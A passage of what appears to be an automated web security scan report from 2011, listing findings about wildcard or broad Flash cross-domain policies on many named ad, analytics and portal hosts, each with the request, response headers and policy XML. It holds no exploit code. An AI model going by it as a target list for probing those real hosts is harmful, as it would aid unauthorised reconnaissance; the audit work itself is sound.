Content-Type: application/xml
Expires: Mon, 25 Apr 2011 15:30:37 GMT
Content-Length: 100
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

6.13. http://cdn-01.yumenetworks.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdn-01.yumenetworks.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn-01.yumenetworks.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2
ETag: "182c001-122-454adb8106440"
Accept-Ranges: bytes
Content-Type: application/xml
Age: 121191
Date: Mon, 25 Apr 2011 14:54:12 GMT
Last-Modified: Sun, 17 Aug 2008 20:30:01 GMT
Content-Length: 290
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allo
...[SNIP]...

6.14. http://counter.rambler.ru/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://counter.rambler.ru
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: counter.rambler.ru

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 14:27:04 GMT
Expires: Mon, 25 Apr 2011 14:37:04 GMT
Content-type: text/plain
Content-length: 288
Last-Modified: Mon, 14 Feb 2011 12:33:32 GMT

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy (View Source for full doctype...)>
<cross-domain-policy>
<allow-access-from domain="*" to-ports="80" secure="true" />
<allow-ht
...[SNIP]...

6.15. http://d7.zedo.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: d7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Content-Length: 248
Content-Type: application/xml
ETag: "3a9d108-f8-46a2ad4ab2800"
X-Varnish: 619922229
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=931
Date: Mon, 25 Apr 2011 15:14:04 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

6.16. http://event.adxpose.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://event.adxpose.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: event.adxpose.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"203-1302122676000"
Last-Modified: Wed, 06 Apr 2011 20:44:36 GMT
Content-Type: application/xml
Content-Length: 203
Date: Mon, 25 Apr 2011 14:23:41 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy> <allow-access-from domain="*" /></cross-domain-poli
...[SNIP]...

6.17. http://games.mochiads.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://games.mochiads.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: games.mochiads.com

Response

HTTP/1.0 200 OK
Server: nginx
Content-Type: text/xml
Content-Length: 213
Last-Modified: Thu, 21 Oct 2010 04:46:54 GMT
P3P: policyref="http://www.mochimedia.com/p3p/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
X-Permitted-Cross-Domain-Policies: master-only
User-Header: X-Permitted-Cross-Domain-Policies: master-only
X-MochiAds-Server: 38.102.129.47:80
Accept-Ranges: bytes
X-Mochi-Backend: 10.0.0.105:40049
X-Mochi-Source: 10.0.0.238:27050
Date: Mon, 25 Apr 2011 14:45:26 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" to-ports="80" />
</cross-do
...[SNIP]...

6.18. http://goods.adnectar.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://goods.adnectar.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: goods.adnectar.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.2
Date: Mon, 25 Apr 2011 14:30:25 GMT
Content-Type: text/xml
Content-Length: 326
Last-Modified: Fri, 22 Apr 2011 00:28:46 GMT
Connection: close
Set-Cookie: adnectar_id=PObkQ021hYFNKXjmCLwgAg==; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=adnectar.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI ADM DEV PSAi COM NAV OUR STP IND DEM"
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

6.19. http://goods43.adnectar.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://goods43.adnectar.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: goods43.adnectar.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.2
Date: Mon, 25 Apr 2011 14:31:29 GMT
Content-Type: text/xml
Content-Length: 326
Last-Modified: Fri, 22 Apr 2011 00:28:46 GMT
Connection: close
Set-Cookie: adnectar_id=PObkQ021hcFNKXjmCL4qAg==; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=adnectar.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI ADM DEV PSAi COM NAV OUR STP IND DEM"
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

6.20. http://img.en25.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.en25.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: img.en25.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Tue, 26 May 2009 19:46:00 GMT
Accept-Ranges: bytes
ETag: "04c37983adec91:0"
Server: Microsoft-IIS/7.5
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Content-Length: 206
Cache-Control: max-age=0
Date: Mon, 25 Apr 2011 14:54:46 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

6.21. http://learn.shavlik.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://learn.shavlik.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: learn.shavlik.com

Response

HTTP/1.1 200 OK
Content-Length: 145
Content-Type: text/xml
Content-Location: http://learn.shavlik.com/crossdomain.xml
Last-Modified: Sun, 23 Aug 2009 19:48:53 GMT
Accept-Ranges: bytes
ETag: "4e3f9ebe2a24ca1:1772"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 12:16:43 GMT
Connection: close

<?xml version="1.0"?>

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.22. http://m.adnxs.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://m.adnxs.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: m.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 26-Apr-2011 14:37:37 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

6.23. http://map.media6degrees.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://map.media6degrees.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: map.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"288-1225232951000"
Last-Modified: Tue, 28 Oct 2008 22:29:11 GMT
Content-Type: application/xml
Content-Length: 288
Date: Mon, 25 Apr 2011 14:37:39 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-http-request-headers-from domain="*" headers="*"
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.24. http://mbox5.offermatica.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mbox5.offermatica.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: mbox5.offermatica.com

Response

HTTP/1.1 200 OK
ETag: W/"201-1302288767000"
Accept-Ranges: bytes
Content-Length: 201
Date: Mon, 25 Apr 2011 15:13:56 GMT
Connection: close
Last-Modified: Fri, 08 Apr 2011 18:52:47 GMT
Server: Test & Target
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

...[SNIP]...

6.25. http://pda.loveplanet.ru/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pda.loveplanet.ru
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pda.loveplanet.ru

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:51:45 GMT
Content-Type: text/xml; charset=UTF-8
Content-Length: 145
Last-Modified: Wed, 13 Apr 2011 14:01:14 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

6.26. http://pixel.fetchback.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.fetchback.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.fetchback.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:13:58 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 213
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-do
...[SNIP]...

6.27. http://pixel.quantserve.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Tue, 26 Apr 2011 14:34:49 GMT
Content-Type: text/xml
Content-Length: 207
Date: Mon, 25 Apr 2011 14:34:49 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

6.28. http://pl.yumenetworks.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pl.yumenetworks.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.1
Host: pl.yumenetworks.com
Proxy-Connection: keep-alive
Referer: http://games.mochiads.com/c/g/moon-volley/mvolley.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yumerm=0rO0ABXcMAAAAAQAAAJkAAAAA

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:53:48 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.7a DAV/2
Last-Modified: Sun, 17 Aug 2008 20:39:50 GMT
ETag: "10d0439-122-454addb2bd180"
Accept-Ranges: bytes
Content-Length: 290
P3P: policyref="http://ads.yumenetworks.com/P3P/PolicyReferences.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allo
...[SNIP]...

6.29. http://playspal.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://playspal.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: playspal.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Mon, 25 Apr 2011 14:54:27 GMT
Content-Type: application/xml
Connection: close
Last-Modified: Tue, 23 Nov 2010 09:52:59 GMT
ETag: "9828d2a-68-4ceb8efb"
Accept-Ranges: bytes
Content-Length: 104

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.30. http://pretty.ru/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pretty.ru
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pretty.ru

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:24:34 GMT
Content-Type: text/xml; charset=UTF-8
Content-Length: 145
Last-Modified: Wed, 13 Apr 2011 14:01:14 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

6.31. http://r2.mail.ru/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: r2.mail.ru

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:29:54 GMT
Content-Type: text/xml
Content-Length: 201
Last-Modified: Thu, 21 Oct 2010 07:11:54 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.32. http://rbcgaru.hit.gemius.pl/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://rbcgaru.hit.gemius.pl
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: rbcgaru.hit.gemius.pl

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:44:56 GMT
Expires: Tue, 26 Apr 2011 02:44:56 GMT
Accept-Ranges: none
Cache-Control: max-age=43200
Last-Modified: Fri, 25 Mar 2011 05:08:30 GMT
Set-Cookie: Gtestss=Fsq2YwPLQP_9r7xYrzcdmPT7; Domain=hit.gemius.pl; Path=/; Expires=Tue, 05 Apr 2016 00:00:00 GMT
Set-Cookie: Gdyn=KlSwsBFGvGQp0xo8SLL8RScGGGMaxFmPxD14HsMQGs..; Domain=hit.gemius.pl; Path=/; Expires=Tue, 05 Apr 2016 00:00:00 GMT
P3P: CP="NOI DSP COR NID PSAo OUR IND"
Connection: close
Content-Type: text/xml
Content-Length: 246

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

6.33. http://rs.mail.ru/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://rs.mail.ru
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: rs.mail.ru

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:45:40 GMT
Content-Type: text/xml
Content-Length: 201
Last-Modified: Thu, 21 Oct 2010 07:11:54 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.34. http://s0.2mdn.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s0.2mdn.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 24 Apr 2011 21:09:16 GMT
Expires: Thu, 21 Apr 2011 21:08:25 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 63651
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.35. http://search.twitter.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://search.twitter.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: search.twitter.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:40:08 GMT
Server: hi
Last-Modified: Tue, 25 Jan 2011 18:04:30 GMT
Cache-Control: max-age=1800
Expires: Mon, 25 Apr 2011 15:01:27 GMT
Content-Type: application/xml
Content-Length: 206
Vary: Accept-Encoding
X-Varnish: 124651946 124570955
Age: 521
Via: 1.1 varnish
X-Cache-Svr: smf1-aaq-31-sr2.prod.twitter.com
X-Cache: HIT
X-Cache-Hits: 4
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

6.36. http://widgets.fotocash.ru/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://widgets.fotocash.ru
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: widgets.fotocash.ru

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 25 Apr 2011 14:29:10 GMT
Content-Type: text/xml
Content-Length: 138
Last-Modified: Thu, 21 Oct 2010 13:56:12 GMT
Connection: close
Expires: Wed, 25 May 2011 14:29:10 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permitted-cross-domain-policies="master-only"/>
</cross-domain-policy>

6.37. http://gomail.radar.imgsmail.ru/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://gomail.radar.imgsmail.ru
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: gomail.radar.imgsmail.ru

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 14:51:42 GMT
Server: Apache/1.3.27 (Unix) mru_xml/0.471 gorgona/2.1 mod_jk/1.2.4 mod_ruby/1.0.7 Ruby/1.6.8 mod_mrim/0.17
Connection: close
Content-Length: 172
Content-Type: text/xml

<?xml version="1.0"?><cross-domain-policy><allow-access-from domain="*.mail.ru" to-ports="*"/><allow-access-from domain="*.imgsmail.ru" to-ports="*"/></cross-domain-policy>

6.38. http://googleads.g.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Sun, 24 Apr 2011 21:14:04 GMT
Expires: Mon, 25 Apr 2011 21:14:04 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 53567
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

6.39. http://imagesrv.gartner.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imagesrv.gartner.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: imagesrv.gartner.com

Response

HTTP/1.1 200 OK
Connection: close
Content-type: text/xml
Last-modified: Mon, 11 Jan 2010 19:57:11 GMT
Date: Mon, 25 Apr 2011 12:11:16 GMT
Content-Length: 250
ETag: "pv3dca051be9ba6a415f8df8e0b0d315af"
X-PvInfo: [S10232.C10821.A151092.RA0.G24F27.U50F79C0A].[OT/xml.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: bytes
Set-Cookie: TS83f541=3bc17e06277dbf6b1363ce7f36ea10b3bb7b54d78751fcaa4db564e4; Path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.gartner.com" />
<allow-access-from domain="imagesrv" />
...[SNIP]...

6.40. http://img.dt00.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://img.dt00.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: img.dt00.net

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:50:50 GMT
Content-Type: text/xml
Content-Length: 526
Last-Modified: Thu, 22 Apr 2010 11:07:27 GMT
Connection: close
Expires: Wed, 25 May 2011 14:50:50 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="intv.ru" to-ports="80"/>
<allow-http-request-headers-from domain="intv.ru" headers="*" />
<allow-access-from domain="*.intv.ru" to-ports="80"/>
...[SNIP]...
<allow-access-from domain="www.liveresult.ru" to-ports="80"/>
...[SNIP]...

6.41. http://img.imgsmail.ru/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://img.imgsmail.ru
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: img.imgsmail.ru

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 25 Apr 2011 14:54:43 GMT
Content-Type: text/xml
Content-Length: 358
Last-Modified: Thu, 15 Apr 2010 15:17:53 GMT
Connection: close
Expires: Mon, 02 May 2011 14:54:43 GMT
Cache-Control: max-age=604800
Accept-Ranges: bytes

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*.files.mail.ru" to-ports="80" />
<allow-access-from domain="img.imgsmail.ru" to-ports="80" />
<allow-access-from domain="*.mail.ru" to-ports="80" />
...[SNIP]...
<allow-access-from domain="mail.ru" to-ports="80" />
...[SNIP]...

6.42. http://img.mail.ru/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://img.mail.ru
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: img.mail.ru

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 25 Apr 2011 14:34:11 GMT
Content-Type: text/xml
Content-Length: 358
Last-Modified: Thu, 15 Apr 2010 15:17:53 GMT
Connection: close
Expires: Mon, 02 May 2011 14:34:11 GMT
Cache-Control: max-age=604800
Accept-Ranges: bytes

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*.files.mail.ru" to-ports="80" />
<allow-access-from domain="img.imgsmail.ru" to-ports="80" />
<allow-access-from domain="*.mail.ru" to-ports="80" />
...[SNIP]...
<allow-access-from domain="mail.ru" to-ports="80" />
...[SNIP]...

6.43. http://js.dt00.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://js.dt00.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: js.dt00.net

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:40:24 GMT
Content-Type: text/xml
Content-Length: 526
Last-Modified: Thu, 22 Apr 2010 11:07:27 GMT
Connection: close
Expires: Wed, 25 May 2011 14:40:24 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="intv.ru" to-ports="80"/>
<allow-http-request-headers-from domain="intv.ru" headers="*" />
<allow-access-from domain="*.intv.ru" to-ports="80"/>
...[SNIP]...
<allow-access-from domain="www.liveresult.ru" to-ports="80"/>
...[SNIP]...

6.44. http://mail.radar.imgsmail.ru/crossdomain.xml previous next

Summary

Severity:	Low
